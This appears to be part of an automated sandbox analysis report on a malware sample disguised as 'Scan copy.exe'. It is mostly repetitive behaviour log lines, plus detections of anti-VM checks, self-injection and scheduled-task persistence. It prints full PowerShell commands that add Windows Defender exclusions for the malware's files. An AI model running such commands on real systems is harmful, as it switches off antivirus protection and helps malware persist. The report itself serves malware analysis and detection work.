Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Process information set: NOGPFAULTERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: Scan copy.exe PID: 5420, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vLQwEscoQr.exe PID: 7512, type: MEMORYSTR

Source: C:\Users\user\Desktop\Scan copy.exe	Memory allocated: B40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Memory allocated: 26E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Memory allocated: 46E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Memory allocated: 8770000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Memory allocated: 6E40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Memory allocated: 9770000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Memory allocated: A770000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Memory allocated: 2DE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Memory allocated: 2FE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Memory allocated: 4FE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Memory allocated: 9260000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Memory allocated: 8DC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Memory allocated: A260000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Memory allocated: B260000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Scan copy.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5149	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6249	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 402	Jump to behavior

Source: C:\Users\user\Desktop\Scan copy.exe TID: 6308	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7208	Thread sleep count: 5149 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7420	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7184	Thread sleep count: 339 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7324	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7460	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7240	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe TID: 7384	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe TID: 7604	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Scan copy.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: vLQwEscoQr.exe, 00000014.00000002.1320615197.0000000001258000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllY
Source: Scan copy.exe, 0000000A.00000002.2501554118.0000000000D18000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllB

Source: C:\Users\user\Desktop\Scan copy.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe

Code function: 20_2_0040317B mov eax, dword ptr fs:[00000030h]

20_2_0040317B

Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe

Code function: 20_2_00402B7C GetProcessHeap,HeapAlloc,

20_2_00402B7C

Source: C:\Users\user\Desktop\Scan copy.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\Scan copy.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\Scan copy.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Scan copy.exe"
Source: C:\Users\user\Desktop\Scan copy.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vLQwEscoQr.exe"
Source: C:\Users\user\Desktop\Scan copy.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Scan copy.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vLQwEscoQr.exe"	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Scan copy.exe	Memory written: C:\Users\user\Desktop\Scan copy.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Memory written: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe base: 400000 value starts with: 4D5A			Jump to behavior

Source: C:\Users\user\Desktop\Scan copy.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Scan copy.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vLQwEscoQr.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vLQwEscoQr" /XML "C:\Users\user\AppData\Local\Temp\tmp18EC.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process created: C:\Users\user\Desktop\Scan copy.exe "C:\Users\user\Desktop\Scan copy.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vLQwEscoQr" /XML "C:\Users\user\AppData\Local\Temp\tmp2BF7.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Process created: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe "C:\Users\user\AppData\Roaming\vLQwEscoQr.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Scan copy.exe	Queries volume information: C:\Users\user\Desktop\Scan copy.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
